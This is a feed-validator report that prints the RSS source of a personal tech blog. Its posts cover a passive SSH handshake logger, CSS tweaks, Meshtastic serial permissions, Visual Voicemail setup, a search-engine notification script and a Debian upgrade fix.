This service tests the validity of an RSS 2.0 feed, checking to see that it follows the rules of the RSS specification. For advice from the RSS Advisory Board on how to implement RSS and handle issues such as enclosures and HTML encoding, read the RSS Best Practices Profile. This checker is also a validator of Atom and RSS 1.0 feeds.

Use this tester regularly to ensure that your RSS feed continues to work well in the wide audience of RSS readers, podcast clients and other software that supports the format.



[Valid RSS] This is a valid RSS feed.


This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

  • line 4478, column 0: description should not contain script tag (6 occurrences) [help]

    <script src=""></script>
  • line 4486, column 0: content:encoded should not contain script tag (6 occurrences) [help]

    <script src=""></script>
  • line 6233, column 3: description should not contain relative URL references: # (16 occurrences) [help]

  • line 6235, column 3: content:encoded should not contain relative URL references: # (16 occurrences) [help]



  1. <?xml version="1.0" encoding="utf-8"?>
  2. <rss version="2.0"
  3.  xmlns:dc=""
  4.  xmlns:creativeCommons=""
  5.  xmlns:content=""
  6.  xmlns:atom="">
  8. <channel>
  9.  <title>x-log</title>
  10.  <link></link>
  11.  <description>x-log</description>
  12.  <lastBuildDate>Thu, 17 Oct 2024 21:27:03 +0200</lastBuildDate>
  13.  <language>en</language>
  14.  <managingEditor> (Andreas Jaggi)</managingEditor>
  15.  <webMaster> (Andreas Jaggi)</webMaster>
  16.  <copyright>Andreas Jaggi</copyright>
  17.  <creativeCommons:license></creativeCommons:license>
  18.  <generator>x-log 07a87b</generator>
  19.  <atom:link href="" rel="self" type="application/rss+xml"/>
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  23.    <title>x-log</title>
  24.    <link></link>
  25.  </image>
  28.  <item>
  29.    <title>sshidentifierlogger</title>
  30.    <link></link>
  31.    <guid isPermaLink="true"></guid>
  32.    <dc:creator>Andreas Jaggi</dc:creator>
  33.    <creativeCommons:license></creativeCommons:license>
  34.    <pubDate>Sat, 12 Oct 2024 21:54:40 +0200</pubDate>
  35.    <category domain="">Networking</category>
  36.    <description><![CDATA[<p><a href="" title="x-way/sshidentifierlogger">sshidentifierlogger</a> is a small tool that I started writing about 5 years ago and have been using on some of my hosts.</p>
  37. <p>Its purpose is to listen to network traffic and passively collect identification strings during SSH handshakes.<br>Initially I had a lot of <a href="" title="fail2ban">fail2ban</a> activity on my <a href="" title="Jump server - Wikipedia">jumphost</a>, blocking many SSH scanning/enumeration/bruteforcing attempts and wanted to know what software the attackers use.</p>
  38. <p>A bit particular is that sshidentifierlogger does not depend on the classic C library libpcap, but rather uses the go-native <a href="" title="gopacket/pcapgo">pcapgo</a> implementation by <a href="" title="gopacket/gopacket">gopacket</a>.<br>Thus it can be cross-compiled on any platform, which comes in handy when you do not want to install the full go buildchain on your jumphost.</p>
  39. <p>The collected data is quite interesting (most of the scanning used to be done with libssh2).<br>Which I did leverage to write iptables rules blocking packets with undesired SSH identification strings.<br>This has been quite successfull in reducing the amount of fail2ban activity :-)</p>
  40. ]]></description>
  41.    <content:encoded><![CDATA[<p><a href="" title="x-way/sshidentifierlogger">sshidentifierlogger</a> is a small tool that I started writing about 5 years ago and have been using on some of my hosts.</p>
  42. <p>Its purpose is to listen to network traffic and passively collect identification strings during SSH handshakes.<br>Initially I had a lot of <a href="" title="fail2ban">fail2ban</a> activity on my <a href="" title="Jump server - Wikipedia">jumphost</a>, blocking many SSH scanning/enumeration/bruteforcing attempts and wanted to know what software the attackers use.</p>
  43. <p>A bit particular is that sshidentifierlogger does not depend on the classic C library libpcap, but rather uses the go-native <a href="" title="gopacket/pcapgo">pcapgo</a> implementation by <a href="" title="gopacket/gopacket">gopacket</a>.<br>Thus it can be cross-compiled on any platform, which comes in handy when you do not want to install the full go buildchain on your jumphost.</p>
  44. <p>The collected data is quite interesting (most of the scanning used to be done with libssh2).<br>Which I did leverage to write iptables rules blocking packets with undesired SSH identification strings.<br>This has been quite successfull in reducing the amount of fail2ban activity :-)</p>
  45. ]]></content:encoded>
  46.  </item>
  48.  <item>
  49.    <title>Styling blockquote and pre elements</title>
  50.    <link></link>
  51.    <guid isPermaLink="true"></guid>
  52.    <dc:creator>Andreas Jaggi</dc:creator>
  53.    <creativeCommons:license></creativeCommons:license>
  54.    <pubDate>Fri, 11 Oct 2024 18:14:02 +0200</pubDate>
  55.    <category domain="">Webdesign</category>
  56.    <description><![CDATA[<p>The <a href="" title="CSS Basics - Blockquotes">Blockquotes</a> and <a href="" title="CSS Basics - Pre-formatted text">Pre-formatted text</a> sections in the <a href="" title="HTML for People">HTML for People</a> book inspired me to improve the styling of the blog.<br>The following code now defines the visual appearance of <code>blockquote</code> and <code>pre</code> elements in the blog:</p>
  57. <pre>blockquote {
  58. border-left: 1px dotted #ffbb18;
  59. padding-left: 21px;
  60. margin-left: 21px;
  61. }
  62. pre {
  63. background-color: #f9f7f7;
  64. border-radius: 4px;
  65. padding: 4px;
  66. }</pre>
  67. <p>To see it in effect, scroll down to the <a href="" title="x-log - Hidden Pref to Restore Slow Motion Dock Minimizing on MacOS">Hidden Pref to Restore Slow Motion Dock Minimizing on MacOS</a> or <a href="" title="x-log - Notifying external services about changes in the blog">Notifying external services about changes in the blog</a> posts.</p>
  68. ]]></description>
  69.    <content:encoded><![CDATA[<p>The <a href="" title="CSS Basics - Blockquotes">Blockquotes</a> and <a href="" title="CSS Basics - Pre-formatted text">Pre-formatted text</a> sections in the <a href="" title="HTML for People">HTML for People</a> book inspired me to improve the styling of the blog.<br>The following code now defines the visual appearance of <code>blockquote</code> and <code>pre</code> elements in the blog:</p>
  70. <pre>blockquote {
  71. border-left: 1px dotted #ffbb18;
  72. padding-left: 21px;
  73. margin-left: 21px;
  74. }
  75. pre {
  76. background-color: #f9f7f7;
  77. border-radius: 4px;
  78. padding: 4px;
  79. }</pre>
  80. <p>To see it in effect, scroll down to the <a href="" title="x-log - Hidden Pref to Restore Slow Motion Dock Minimizing on MacOS">Hidden Pref to Restore Slow Motion Dock Minimizing on MacOS</a> or <a href="" title="x-log - Notifying external services about changes in the blog">Notifying external services about changes in the blog</a> posts.</p>
  81. ]]></content:encoded>
  82.  </item>
  84.  <item>
  85.    <title>Meshtastic Web Serial in Linux as non-root user</title>
  86.    <link></link>
  87.    <guid isPermaLink="true"></guid>
  88.    <dc:creator>Andreas Jaggi</dc:creator>
  89.    <creativeCommons:license></creativeCommons:license>
  90.    <pubDate>Sat, 05 Oct 2024 18:49:09 +0200</pubDate>
  91.    <category domain="">Radio</category>
  92.    <description><![CDATA[<p>Today I played around a bit with a <a href="" title="Meshtastic">Meshtastic</a> device and tried to configure it through the <a href="" title="Web Serial API - Web APIs | MDN">Web Serial API</a> in Chrome.<br>On my Linux system it could see the device but not really change any values, update firmware etc.</p>
  93. <p>This confused me for some time, until I looked at the permissions of <code>/dev/ttyACM0</code> (which were <samp>crw-rw----</samp>).<br>A quick <kbd>sudo chmod a+rw /dev/ttyACM0</kbd> later, and I could write to the configuration of the Meshtastic device.<br>The more tedious part was that after every config change the device rebooted and the USB serial connection was re-initialized by Linux, thus I needed to re-run the chmod command after every change. Luckily I figured out how to enable WiFi on the device and from then on no longer needed the serial access.</p>
  94. ]]></description>
  95.    <content:encoded><![CDATA[<p>Today I played around a bit with a <a href="" title="Meshtastic">Meshtastic</a> device and tried to configure it through the <a href="" title="Web Serial API - Web APIs | MDN">Web Serial API</a> in Chrome.<br>On my Linux system it could see the device but not really change any values, update firmware etc.</p>
  96. <p>This confused me for some time, until I looked at the permissions of <code>/dev/ttyACM0</code> (which were <samp>crw-rw----</samp>).<br>A quick <kbd>sudo chmod a+rw /dev/ttyACM0</kbd> later, and I could write to the configuration of the Meshtastic device.<br>The more tedious part was that after every config change the device rebooted and the USB serial connection was re-initialized by Linux, thus I needed to re-run the chmod command after every change. Luckily I figured out how to enable WiFi on the device and from then on no longer needed the serial access.</p>
  97. ]]></content:encoded>
  98.  </item>
  100.  <item>
  101.    <title>Enable Visual Voicemail on your iPhone with Galaxus Mobile</title>
  102.    <link></link>
  103.    <guid isPermaLink="true"></guid>
  104.    <dc:creator>Andreas Jaggi</dc:creator>
  105.    <creativeCommons:license></creativeCommons:license>
  106.    <pubDate>Mon, 30 Sep 2024 20:47:35 +0200</pubDate>
  107.    <category domain="">Misc</category>
  108.    <description><![CDATA[<p>Turns out that the procedure for enabling Visual Voicemail with <a href="" title="Galaxus Mobile">Galaxus Mobile</a> is the same as for <a href="" title="Enable Visual Voicemail on your iPhone with TalkTalk">TalkTalk</a>.</p>
  109. <p>In my case their database entry was somehow stuck and I first needed to send a <code>VVM OFF</code> to <code>935</code> before starting <a href="" title="Enable Visual Voicemail on your iPhone with TalkTalk">the procedure</a>.</p>
  110. ]]></description>
  111.    <content:encoded><![CDATA[<p>Turns out that the procedure for enabling Visual Voicemail with <a href="" title="Galaxus Mobile">Galaxus Mobile</a> is the same as for <a href="" title="Enable Visual Voicemail on your iPhone with TalkTalk">TalkTalk</a>.</p>
  112. <p>In my case their database entry was somehow stuck and I first needed to send a <code>VVM OFF</code> to <code>935</code> before starting <a href="" title="Enable Visual Voicemail on your iPhone with TalkTalk">the procedure</a>.</p>
  113. ]]></content:encoded>
  114.  </item>
  116.  <item>
  117.    <title>Hidden Pref to Restore Slow-Motion Dock Minimizing on MacOS</title>
  118.    <link></link>
  119.    <guid isPermaLink="true"></guid>
  120.    <dc:creator>Andreas Jaggi</dc:creator>
  121.    <creativeCommons:license></creativeCommons:license>
  122.    <pubDate>Sun, 29 Sep 2024 01:16:45 +0200</pubDate>
  123.    <category domain="">Mac</category>
  124.    <description><![CDATA[<p><a href="" title="Daring Fireball: Hidden Pref to Restore Slow-Motion Dock Minimizing on MacOS">Daring Fireball describes</a> how to restore the old trick of slow motion MacOS Dock effects:</p>
  125. <blockquote cite="">
  126. <p>In the midst of recording last week’s episode of The Talk Show with Nilay Patel, I offhandedly mentioned the age-old trick of holding down the Shift key while minimizing a window (clicking the yellow button) to see the genie effect in slow motion. Nilay was like “Wait, what? That’s not working for me...” and we moved on.</p>
  127. <p><a href="">What I’d forgotten</a> is that Apple had removed this as default behavior a few years ago (I think in MacOS 10.14 Mojave), but you can restore the feature with this hidden preference, typed in Terminal:</p>
  128. <pre>defaults write slow-motion-allowed -bool YES</pre>
  129. <p>Then restart the Dock:</p>
  130. <pre>killall Dock</pre>
  131. <p>Or, in a single command:</p>
  132. <pre>defaults write slow-motion-allowed -bool YES; killall Dock</pre>
  133. <p>I had forgotten that this had become a hidden preference, and that I’d long ago enabled it.</p>
  134. </blockquote>
  135. ]]></description>
  136.    <content:encoded><![CDATA[<p><a href="" title="Daring Fireball: Hidden Pref to Restore Slow-Motion Dock Minimizing on MacOS">Daring Fireball describes</a> how to restore the old trick of slow motion MacOS Dock effects:</p>
  137. <blockquote cite="">
  138. <p>In the midst of recording last week’s episode of The Talk Show with Nilay Patel, I offhandedly mentioned the age-old trick of holding down the Shift key while minimizing a window (clicking the yellow button) to see the genie effect in slow motion. Nilay was like “Wait, what? That’s not working for me...” and we moved on.</p>
  139. <p><a href="">What I’d forgotten</a> is that Apple had removed this as default behavior a few years ago (I think in MacOS 10.14 Mojave), but you can restore the feature with this hidden preference, typed in Terminal:</p>
  140. <pre>defaults write slow-motion-allowed -bool YES</pre>
  141. <p>Then restart the Dock:</p>
  142. <pre>killall Dock</pre>
  143. <p>Or, in a single command:</p>
  144. <pre>defaults write slow-motion-allowed -bool YES; killall Dock</pre>
  145. <p>I had forgotten that this had become a hidden preference, and that I’d long ago enabled it.</p>
  146. </blockquote>
  147. ]]></content:encoded>
  148.  </item>
  150.  <item>
  151.    <title>Notifying external services about changes in the blog</title>
  152.    <link></link>
  153.    <guid isPermaLink="true"></guid>
  154.    <dc:creator>Andreas Jaggi</dc:creator>
  155.    <creativeCommons:license></creativeCommons:license>
  156.    <pubDate>Wed, 25 Sep 2024 10:23:25 +0200</pubDate>
  157.    <category domain="">Coding</category>
  158.    <description><![CDATA[<p>For some time now, I'm <a href="" title=" still Pinging - x-log">notifying about changes in the blog</a>. After looking a bit into how search engines percieve my website recently, I learned that they also have some notification mechanisms for new pages/blogposts.</p>
  159. <p>Thus I upgraded the oneliner into a dedicated script to notify external services about changes in the blog.<br>It is optimized for my Jekyll setup, where the generated pages in the _site folder are stored in git.<br>The notification ignores changes to summarized pages like rss.xml etc to only trigger notifications when there are changes in the original blog posts.</p>
  160. <p>Here's the script, feel free to re-use (it expects to have <var>MYDOMAIN</var>, <var>INDEXNOW_API_KEY</var> and <var>BING_API_KEY</var> defined as environment variables):</p>
  161. <pre>#!/bin/bash
  163. set -e
  164. set -u
  165. set -o pipefail
  167. CHANGES="$(git diff --name-only HEAD HEAD~1 -- _site)"
  169. # early abort if no changes on _site
  170. if [ -z "$CHANGES" ] ; then
  171. echo "No changes in _site found"
  172. exit 0
  173. fi
  175. # build URL list
  176. URLLIST="\"https://${MYDOMAIN}/\""
  177. for f in $CHANGES ; do
  178. case "$f" in
  179. _site/robots.txt|_site/humans.txt|_site/about.html|_site/rss.xml|_site/atom.xml|_site/feed.json|_site/sitemap.xml)
  180. continue
  181. ;;
  182. *)
  183. url=$(echo "$f"|sed -e "sX^_siteXhttps://${MYDOMAIN}X")
  184. URLLIST="${URLLIST},\"${url}\""
  185. ;;
  186. esac
  187. done
  189. if [ "\"https://${MYDOMAIN}/\"" = "$URLLIST" ] ; then
  190. echo "No relevant changes in _site found, skipping notifications"
  191. exit 0
  192. fi
  194. # notify (Automattic) about updates
  195. curl --fail -s -D - -X POST -H 'content-type: text/xml' --data "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://${MYDOMAIN}/&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://${MYDOMAIN}/rss.xml&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;"
  197. # report changed URLs to indexnow, include /indexnow canary URL
  198. curl --fail -s -D - -X POST -H 'content-type: application/json; charset=utf-8' --data "{\"host\":\"${MYDOMAIN}\",\"key\":\"${INDEXNOW_API_KEY}\",\"urlList\":[${URLLIST},\"https://${MYDOMAIN}/indexnow\"]}"
  200. # report changes URLs to bing, include /bingsubmit canary URL
  201. curl --fail -s -D - -X POST "${BING_API_KEY}" -H 'content-type: application/json; charset=utf-8' --data "{\"siteUrl\":\"https://${MYDOMAIN}\",\"urlList\":[${URLLIST},\"https://${MYDOMAIN}/bingsubmit\"]}"</pre>
  202. ]]></description>
  203.    <content:encoded><![CDATA[<p>For some time now, I'm <a href="" title=" still Pinging - x-log">notifying about changes in the blog</a>. After looking a bit into how search engines percieve my website recently, I learned that they also have some notification mechanisms for new pages/blogposts.</p>
  204. <p>Thus I upgraded the oneliner into a dedicated script to notify external services about changes in the blog.<br>It is optimized for my Jekyll setup, where the generated pages in the _site folder are stored in git.<br>The notification ignores changes to summarized pages like rss.xml etc to only trigger notifications when there are changes in the original blog posts.</p>
  205. <p>Here's the script, feel free to re-use (it expects to have <var>MYDOMAIN</var>, <var>INDEXNOW_API_KEY</var> and <var>BING_API_KEY</var> defined as environment variables):</p>
  206. <pre>#!/bin/bash
  208. set -e
  209. set -u
  210. set -o pipefail
  212. CHANGES="$(git diff --name-only HEAD HEAD~1 -- _site)"
  214. # early abort if no changes on _site
  215. if [ -z "$CHANGES" ] ; then
  216. echo "No changes in _site found"
  217. exit 0
  218. fi
  220. # build URL list
  221. URLLIST="\"https://${MYDOMAIN}/\""
  222. for f in $CHANGES ; do
  223. case "$f" in
  224. _site/robots.txt|_site/humans.txt|_site/about.html|_site/rss.xml|_site/atom.xml|_site/feed.json|_site/sitemap.xml)
  225. continue
  226. ;;
  227. *)
  228. url=$(echo "$f"|sed -e "sX^_siteXhttps://${MYDOMAIN}X")
  229. URLLIST="${URLLIST},\"${url}\""
  230. ;;
  231. esac
  232. done
  234. if [ "\"https://${MYDOMAIN}/\"" = "$URLLIST" ] ; then
  235. echo "No relevant changes in _site found, skipping notifications"
  236. exit 0
  237. fi
  239. # notify (Automattic) about updates
  240. curl --fail -s -D - -X POST -H 'content-type: text/xml' --data "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://${MYDOMAIN}/&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://${MYDOMAIN}/rss.xml&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;"
  242. # report changed URLs to indexnow, include /indexnow canary URL
  243. curl --fail -s -D - -X POST -H 'content-type: application/json; charset=utf-8' --data "{\"host\":\"${MYDOMAIN}\",\"key\":\"${INDEXNOW_API_KEY}\",\"urlList\":[${URLLIST},\"https://${MYDOMAIN}/indexnow\"]}"
  245. # report changes URLs to bing, include /bingsubmit canary URL
  246. curl --fail -s -D - -X POST "${BING_API_KEY}" -H 'content-type: application/json; charset=utf-8' --data "{\"siteUrl\":\"https://${MYDOMAIN}\",\"urlList\":[${URLLIST},\"https://${MYDOMAIN}/bingsubmit\"]}"</pre>
  247. ]]></content:encoded>
  248.  </item>
  250.  <item>
  251.    <title>Enable Visual Voicemail on your iPhone with TalkTalk</title>
  252.    <link></link>
  253.    <guid isPermaLink="true"></guid>
  254.    <dc:creator>Andreas Jaggi</dc:creator>
  255.    <creativeCommons:license></creativeCommons:license>
  256.    <pubDate>Tue, 24 Sep 2024 18:36:01 +0200</pubDate>
  257.    <category domain="">Misc</category>
  258.    <description><![CDATA[<p>When you switch to <a href="" title="TalkTalk • Dein Mobilfunk-, Telefon- & Internetanbieter">TalkTalk</a> as your mobile phone provider, by default Visual Voicemail for your iPhone is not enabled.<br>And you're stuck with the 90s voiceprompt of the 'Talkbox'.</p>
  259. <p>The following steps will activate Visual Voicemail for your iPhone:</p>
  260. <ol>
  261. <li>Send a SMS text message with <code>VVM ON</code> to the number <code>935</code>.</li>
  262. <li>Shortly after you should get a text message confirming that Visual Voicemail has been enabled for you.</li>
  263. <li>Now on the iPhone, open the phone app and go to the voicemail tab. There you will either see a button asking you to setup the voicemail or a button taking you to the 90s voiceprompt.</li>
  264. <li>Do click on this button and setup the six-digit PIN code for your voicemail (this can be done either via a call/voiceprompt or via the guided iPhone button/dialog).</li>
  265. <li>Once you have setup the PIN for your voicemail, close the phone app on your iPhone.</li>
  266. <li>Then open the phone app again and go to the voicemail tab, where it should show the usual Visual Voicemail list of missed calls and no longer the button to call the 90s voiceprompt.<br>In my case it took a couple minutes for this to work, thus some patience might be needed.</li>
  267. <li>Congratulations, you have now a working Visual Voicemail on your iPhone with TalkTalk :-)</li>
  268. </ol>
  269. ]]></description>
  270.    <content:encoded><![CDATA[<p>When you switch to <a href="" title="TalkTalk • Dein Mobilfunk-, Telefon- & Internetanbieter">TalkTalk</a> as your mobile phone provider, by default Visual Voicemail for your iPhone is not enabled.<br>And you're stuck with the 90s voiceprompt of the 'Talkbox'.</p>
  271. <p>The following steps will activate Visual Voicemail for your iPhone:</p>
  272. <ol>
  273. <li>Send a SMS text message with <code>VVM ON</code> to the number <code>935</code>.</li>
  274. <li>Shortly after you should get a text message confirming that Visual Voicemail has been enabled for you.</li>
  275. <li>Now on the iPhone, open the phone app and go to the voicemail tab. There you will either see a button asking you to setup the voicemail or a button taking you to the 90s voiceprompt.</li>
  276. <li>Do click on this button and setup the six-digit PIN code for your voicemail (this can be done either via a call/voiceprompt or via the guided iPhone button/dialog).</li>
  277. <li>Once you have setup the PIN for your voicemail, close the phone app on your iPhone.</li>
  278. <li>Then open the phone app again and go to the voicemail tab, where it should show the usual Visual Voicemail list of missed calls and no longer the button to call the 90s voiceprompt.<br>In my case it took a couple minutes for this to work, thus some patience might be needed.</li>
  279. <li>Congratulations, you have now a working Visual Voicemail on your iPhone with TalkTalk :-)</li>
  280. </ol>
  281. ]]></content:encoded>
  282.  </item>
  284.  <item>
  285.    <title>Another weekend, another festival - Subset Festival</title>
  286.    <link></link>
  287.    <guid isPermaLink="true"></guid>
  288.    <dc:creator>Andreas Jaggi</dc:creator>
  289.    <creativeCommons:license></creativeCommons:license>
  290.    <pubDate>Sun, 22 Sep 2024 16:42:39 +0200</pubDate>
  291.    <category domain="">Music</category>
  292.    <description><![CDATA[<p>No festival this weekend. Did some hiking with friends instead.</p>
  293. <p>Last weekend I attended the <a href="" title="Subset Festival | Drum & Bass | Kempttal, Switzerland">Subset Festival</a>. It was the first edition of a new drum and bass focused festival.<br>There were some great artists there, most of them I knew before and was very much looking forward to see them live.</p>
  294. <p>My favorite one was (unsurprisingly?) <a href="" title="Andromedik">Andromedik</a>, but also liked <a href="" title="Hybrid Minds">Hybrid Minds</a>, <a href="" title="Netsky">Netsky</a> and <a href="" title="ANDY C">Andy C</a>.<br>Very cool was that the festival was rather small, so felt quite intimate and super close to the artists.</p>
  295. <p>Could post the same music video <a href="" title="Lost Frequencies - The Feeling - x-log">as two weeks ago</a> (Andromedik's remix of The Feeling, which he said is a song very close to his heart), but you should also discover some other tracks.<br>Thus here we go with the recently released Paradise 🥳</p>
  296. <p><a href="" title="Andromedik - Paradise (ft. Luka)">Andromedik - Paradise (ft. Luka)</a></p>
  297. ]]></description>
  298.    <content:encoded><![CDATA[<p>No festival this weekend. Did some hiking with friends instead.</p>
  299. <p>Last weekend I attended the <a href="" title="Subset Festival | Drum & Bass | Kempttal, Switzerland">Subset Festival</a>. It was the first edition of a new drum and bass focused festival.<br>There were some great artists there, most of them I knew before and was very much looking forward to see them live.</p>
  300. <p>My favorite one was (unsurprisingly?) <a href="" title="Andromedik">Andromedik</a>, but also liked <a href="" title="Hybrid Minds">Hybrid Minds</a>, <a href="" title="Netsky">Netsky</a> and <a href="" title="ANDY C">Andy C</a>.<br>Very cool was that the festival was rather small, so felt quite intimate and super close to the artists.</p>
  301. <p>Could post the same music video <a href="" title="Lost Frequencies - The Feeling - x-log">as two weeks ago</a> (Andromedik's remix of The Feeling, which he said is a song very close to his heart), but you should also discover some other tracks.<br>Thus here we go with the recently released Paradise 🥳</p>
  302. <p><a href="" title="Andromedik - Paradise (ft. Luka)">Andromedik - Paradise (ft. Luka)</a></p>
  303. ]]></content:encoded>
  304.  </item>
  306.  <item>
  307.    <title>Simplified archive links</title>
  308.    <link></link>
  309.    <guid isPermaLink="true"></guid>
  310.    <dc:creator>Andreas Jaggi</dc:creator>
  311.    <creativeCommons:license></creativeCommons:license>
  312.    <pubDate>Thu, 19 Sep 2024 23:07:06 +0200</pubDate>
  313.    <category domain="">Misc</category>
  314.    <description><![CDATA[<p>Building up on the changes from the <a href="" title="Canonical hints - x-log">canonical hints</a>, I simplified the structure of the archive links.<p>
  315. <p>Now it's <var>/year/month/</var> everywhere.<br>Which of course brings another round of redirects to support in the nginx config to map the <var>/archive/archive-year-month.html</var> links to <var>/year/month/</var> 🙈</p>
  316. <p>In theory all previous link schemes should still work, but if you find a broken link, please let me know :-)</p>
  317. ]]></description>
  318.    <content:encoded><![CDATA[<p>Building up on the changes from the <a href="" title="Canonical hints - x-log">canonical hints</a>, I simplified the structure of the archive links.<p>
  319. <p>Now it's <var>/year/month/</var> everywhere.<br>Which of course brings another round of redirects to support in the nginx config to map the <var>/archive/archive-year-month.html</var> links to <var>/year/month/</var> 🙈</p>
  320. <p>In theory all previous link schemes should still work, but if you find a broken link, please let me know :-)</p>
  321. ]]></content:encoded>
  322.  </item>
  324.  <item>
  325.    <title>Canonical hints</title>
  326.    <link></link>
  327.    <guid isPermaLink="true"></guid>
  328.    <dc:creator>Andreas Jaggi</dc:creator>
  329.    <creativeCommons:license></creativeCommons:license>
  330.    <pubDate>Sat, 14 Sep 2024 11:44:10 +0200</pubDate>
  331.    <category domain="">Webdesign</category>
  332.    <description><![CDATA[<p>To help regular search engines be less confused about the various pages of the blog (especially multiple generations of old inherited URL schemes), I added canonical hints to some pages.</p>
  333. <p>Mostly straight-forward, except for the archives where I chose the concise <var>/year/month/</var> scheme instead of the full <var>/archive/archive-year-month.html</var>.<br>Curious to see how this works out. Currently the links in the navigation and overview point to the full URLs, and the short ones are only implemented with rewrites in nginx and visible in the canonical hints.</p>
  334. ]]></description>
  335.    <content:encoded><![CDATA[<p>To help regular search engines be less confused about the various pages of the blog (especially multiple generations of old inherited URL schemes), I added canonical hints to some pages.</p>
  336. <p>Mostly straight-forward, except for the archives where I chose the concise <var>/year/month/</var> scheme instead of the full <var>/archive/archive-year-month.html</var>.<br>Curious to see how this works out. Currently the links in the navigation and overview point to the full URLs, and the short ones are only implemented with rewrites in nginx and visible in the canonical hints.</p>
  337. ]]></content:encoded>
  338.  </item>
  340.  <item>
  341.    <title>How to fix missing after Debian upgrade</title>
  342.    <link></link>
  343.    <guid isPermaLink="true"></guid>
  344.    <dc:creator>Andreas Jaggi</dc:creator>
  345.    <creativeCommons:license></creativeCommons:license>
  346.    <pubDate>Sat, 14 Sep 2024 06:12:04 +0200</pubDate>
  347.    <category domain="">Linux</category>
  348.    <description><![CDATA[<p>I encountered an old Debian system and tried to upgrade it from Debian 10 (buster) to Debian 12 (bookworm).<br>During the <kbd>apt-get dist-upgrade</kbd> it did run into a problem, where was removed and the upgrade failed to continue.<br>Additionally this caused that <kbd>dpkg</kbd> itself also stopped working and that sshd stopped accepting new connections.<br>Thus fixing the following error became urgent:</p>
  349. <pre>/usr/bin/python3: error while loading shared libraries: cannot open shared object file: No such file or directory</pre>
  350. <p>Luckily I was not the first person to run into this issue.<br>In <a href="" title="upgrade - error after dist-update on Debian - Stack Overflow">a Stack Overflow answer</a> I found the crucial workaround taken from <a href="" title="#993755 - cannot open shared object file when upgrading from Stretch to Sid - Debian Bug report logs">a comment on the corresponding Debian bugreport</a>.<br>The following steps allow to manually install a copy of the missing files to fix the issue (when running this you might have a newer version of the package at hand, thus adjust the <kbd>dpkg-deb</kbd> step accordingly):</p>
  351. <pre>
  352. cd /tmp
  353. apt -y download libcrypt1
  354. dpkg-deb -x libcrypt1_1%3a4.4.33-2_amd64.deb .
  355. cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/
  356. apt -y --fix-broken install
  357. </pre>
  358. ]]></description>
  359.    <content:encoded><![CDATA[<p>I encountered an old Debian system and tried to upgrade it from Debian 10 (buster) to Debian 12 (bookworm).<br>During the <kbd>apt-get dist-upgrade</kbd> it did run into a problem, where was removed and the upgrade failed to continue.<br>Additionally this caused that <kbd>dpkg</kbd> itself also stopped working and that sshd stopped accepting new connections.<br>Thus fixing the following error became urgent:</p>
  360. <pre>/usr/bin/python3: error while loading shared libraries: cannot open shared object file: No such file or directory</pre>
  361. <p>Luckily I was not the first person to run into this issue.<br>In <a href="" title="upgrade - error after dist-update on Debian - Stack Overflow">a Stack Overflow answer</a> I found the crucial workaround taken from <a href="" title="#993755 - cannot open shared object file when upgrading from Stretch to Sid - Debian Bug report logs">a comment on the corresponding Debian bugreport</a>.<br>The following steps allow to manually install a copy of the missing files to fix the issue (when running this you might have a newer version of the package at hand, thus adjust the <kbd>dpkg-deb</kbd> step accordingly):</p>
  362. <pre>
  363. cd /tmp
  364. apt -y download libcrypt1
  365. dpkg-deb -x libcrypt1_1%3a4.4.33-2_amd64.deb .
  366. cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/
  367. apt -y --fix-broken install
  368. </pre>
  369. ]]></content:encoded>
  370.  </item>
  372.  <item>
  373.    <title>Flexboxed archive</title>
  374.    <link></link>
  375.    <guid isPermaLink="true"></guid>
  376.    <dc:creator>Andreas Jaggi</dc:creator>
  377.    <creativeCommons:license></creativeCommons:license>
  378.    <pubDate>Tue, 10 Sep 2024 09:57:35 +0200</pubDate>
  379.    <category domain="">Webdesign</category>
  380.    <description><![CDATA[<p>Applied the <a href="" title="CSS Flexbox Layout Guide | CSS-Tricks">CSS flexbox mechanism</a> to the <a href="" title="x-log - Archive">archive page</a>.<br>This helps to transform the steadily growing lists of monthly archive links into a more userfriendly layout, going from a single column to eight columns and bringing all the links above 'the fold'.</p>
  381. ]]></description>
  382.    <content:encoded><![CDATA[<p>Applied the <a href="" title="CSS Flexbox Layout Guide | CSS-Tricks">CSS flexbox mechanism</a> to the <a href="" title="x-log - Archive">archive page</a>.<br>This helps to transform the steadily growing lists of monthly archive links into a more userfriendly layout, going from a single column to eight columns and bringing all the links above 'the fold'.</p>
  383. ]]></content:encoded>
  384.  </item>
  386.  <item>
  387.    <title>Another weekend, another festival</title>
  388.    <link></link>
  389.    <guid isPermaLink="true"></guid>
  390.    <dc:creator>Andreas Jaggi</dc:creator>
  391.    <creativeCommons:license></creativeCommons:license>
  392.    <pubDate>Sun, 08 Sep 2024 11:06:45 +0200</pubDate>
  393.    <category domain="">Music</category>
  394.    <description><![CDATA[<p>I'm continueing my festival summer also this weekend. Yesterday I've attended the <a href="" title="Festival - Simmentaler Bier">Simmentaler Bier Festival</a>, which celebrates the 10 year anniversary of the <a href="" title="Simmental Bier">Simmentaler Bier</a> brewery.</p>
